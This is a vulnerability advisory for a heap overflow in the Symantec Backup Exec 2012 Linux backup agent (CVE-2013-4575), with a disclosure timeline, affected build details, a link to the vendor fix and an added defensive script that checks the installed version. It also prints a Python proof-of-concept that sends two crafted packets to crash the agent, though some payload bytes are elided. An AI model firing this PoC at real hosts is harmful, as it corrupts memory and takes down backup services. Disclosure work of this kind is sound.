Summary
Name: Symantec Backup Exec 2012 – Linux Backup Agent Heap Overflow
Release Date: 10 August 2012
Reference: NGS00342
Discoverer: Perran Hill
Vendor: Symantec
CVE Reference: CVE-2013-4575
Systems Affected: Symantec Backup Exec 2012
Risk: High
Status: Released
Timeline
Discovered: 13 July 2012
Released: 13 July 2012
Approved: 13 July 2012
Reported: 13 July 2012
Fixed: 1 August 2013
Published: 30 September 2013
Description
Symantec Backup Exec 2012 – Linux Backup Agent Heap Overflow
I. VULNERABILITY
Symantec Backup Exec 2012 ships with a Mac/Unix/Linux Agent that is
vulnerable to a heap overflow (tested on Debian 6.0.4 and CentOS 6.2).
By sending two crafted packets it is possible to cause the client to
terminate with heap corruption.
II. Background
Symantec Backup Exec 2012 is an enterprise-level backup solution. The
affected version of the Agent has the following details:
# /var/VRTSralus/ralus.ver
ralus=1798.17
mdm=MDM_v0.0.6149
vxms=VxMS_4.4_038a
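As an added example (not part of the advisory and not Symantec's code), the following checker parses the key=value format of ralus.ver shown above and flags the build this advisory names. The path and the build number 1798.17 come from the advisory; treating any build at or below 1798.17 as affected is an assumption, and the fixed build should be confirmed against Symantec's own advisory.

```python
"""Flag a Backup Exec Linux agent install by parsing its ralus.ver file.
Added example for this advisory; the file format and the affected build
(ralus=1798.17) are taken from the excerpt in the advisory itself."""
import re

VER_PATH = "/var/VRTSralus/ralus.ver"  # path quoted in the advisory
AFFECTED_RALUS = (1798, 17)            # build shown in the advisory's excerpt

# Constructed sample, identical to the advisory's ralus.ver excerpt
SAMPLE_VER = """ralus=1798.17
mdm=MDM_v0.0.6149
vxms=VxMS_4.4_038a
"""


def parse_ver(text):
    """Return {key: value} for every 'key=value' line; skip blank/comment lines."""
    fields = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        key, sep, value = line.partition("=")
        if sep:
            fields[key.strip()] = value.strip()
    return fields


def ralus_version(fields):
    """Turn the 'ralus' value (e.g. '1798.17') into a comparable tuple, or None."""
    m = re.fullmatch(r"(\d+)\.(\d+)", fields.get("ralus", ""))
    return (int(m.group(1)), int(m.group(2))) if m else None


def is_affected(text):
    """True when the ralus build is at or below the build named in the advisory.
    Assumption: builds newer than 1798.17 carry the vendor fix; verify with
    Symantec's advisory before relying on this."""
    ver = ralus_version(parse_ver(text))
    return ver is not None and ver <= AFFECTED_RALUS


if __name__ == "__main__":
    import sys
    path = sys.argv[1] if len(sys.argv) > 1 else VER_PATH
    try:
        with open(path) as f:
            contents = f.read()
    except OSError as err:
        sys.exit("cannot read %s: %s" % (path, err))
    print("affected" if is_affected(contents) else "not flagged", parse_ver(contents))
```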
III. Description
The Agent can be found on the Symantec install ISO at
/media/SYMANTEC/LinuxUnixMac/RALUS_RMALS_RAMS-1798.17.tar.gz. It is used to
back up remote Linux agents.
Technical Details
Tested/discovered on Debian 6.0.4 and verified on CentOS 6.2 [2.6.32-220.el6.x86_64]
# uname -a
Linux monza3 2.6.32-5-686 #1 SMP Sun May 6 04:01:19 UTC 2012 i686 GNU/Linux
The PoC script below crashes both installations:
#!/usr/local/bin/python
import sys
from socket import *
import os

if (len(sys.argv)!=3):
    print "\n-----------------------------------"
    print "Usage: PoC <host> <port>"
    print "-----------------------------------\n"
    exit(0)

host=sys.argv[1]
port=int(sys.argv[2])

# First crafted packet (remaining payload bytes are elided in this copy of the advisory)
data = bytearray("\x80\x00\x08\x50\x00\x00\x00\x08\x4f\xf5\xaf\xb7\x00\x00\x00\x00\x00\x00\xf3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")
# Second crafted packet (remaining payload bytes are elided in this copy of the advisory)
data2 = bytearray("\x43\x41\x74\x49\x46\x4a\x50\x54\x31\x51\x77\x48\x68\x63\x4e\x4d\x54\x49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")

# Connect to the agent and send the two packets, printing each reply
s = socket(AF_INET, SOCK_STREAM)
s.connect((host, port))
print "sending one"
s.send(data)
x = s.recv(1512)
print list(bytearray(x))
print x
print "sending two"
s.send(data2)
x = s.recv(1512)
print list(bytearray(x))
print x
s.close()
Fix Information
http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20130801_00